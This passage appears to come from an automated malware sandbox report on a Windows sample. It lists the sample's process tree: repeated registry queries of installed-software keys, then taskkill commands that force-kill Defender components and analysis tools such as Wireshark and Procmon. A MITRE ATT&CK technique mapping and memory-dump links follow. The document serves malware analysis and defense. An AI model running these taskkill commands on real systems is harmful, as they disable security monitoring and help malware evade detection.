- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4532
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4384
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:3628
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4896
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4876
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:3680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:3412
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:1732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:2152
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:3064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:3852
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4972
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4840
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4204
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:3496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4276
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:3808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:5012
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:5052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4776
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3280
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:3112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4292
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:5000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:4700
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4604
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:4928
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4144
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:2112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:2092
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:3824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3936
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4496
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3240
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5084
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4248
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4888

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3228-93-0x00000251DFD20000-0x00000251DFD21000-memory.dmp

Filesize
4KB

Download
memory/3228-109-0x00000251DFED0000-0x00000251DFED1000-memory.dmp

Filesize
4KB

Download
memory/3228-78-0x00007FFE411F0000-0x00007FFE41BDC000-memory.dmp

Filesize
9.9MB

Download